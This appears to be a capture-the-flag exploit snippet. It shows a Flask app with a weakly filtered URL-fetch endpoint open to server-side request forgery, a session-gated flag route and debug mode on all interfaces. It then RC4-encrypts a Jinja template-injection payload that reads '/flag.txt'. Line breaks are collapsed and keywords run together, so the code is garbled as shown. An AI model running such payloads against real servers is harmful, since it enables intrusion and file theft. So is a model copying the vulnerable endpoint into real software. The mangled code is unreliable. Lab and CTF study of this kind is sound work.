@app.route('/read') defread(): try: url = request.args.get('url') m = re.findall('^file.*', url, re.IGNORECASE) n = re.findall('flag', url, re.IGNORECASE) if m or n: return'No Hack' res = urllib.urlopen(url) return res.read() except Exception as ex: print str(ex) return'no response'
@app.route('/flag') defflag(): if session and session['username'] == 'fuck': return open('/flag.txt').read() else: return'Access denied'
if __name__=='__main__': app.run( debug=True, host="0.0.0.0" )
def_init_S_box(self): self.Box = [i for i in range(256)] k = [self.key[i % self.key_length] for i in range(256)] j = 0 for i in range(256): j = (j + self.Box[i] + ord(k[i])) % 256 self.Box[i], self.Box[j] = self.Box[j], self.Box[i]
defcrypt(self, plaintext): i = 0 j = 0 result = '' for ch in plaintext: i = (i + 1) % 256 j = (j + self.Box[i]) % 256 self.Box[i], self.Box[j] = self.Box[j], self.Box[i] t = (self.Box[i] + self.Box[j]) % 256 result += chr(self.Box[t] ^ ord(ch)) return result
a = RC4('HereIsTreasure') cmd = "{{ [].__class__.__base__.__subclasses__()[40]('/flag.txt').read() }}" payload = urllib.parse.quote(a.crypt(cmd)) # res = requests.get(url + payload) print(payload)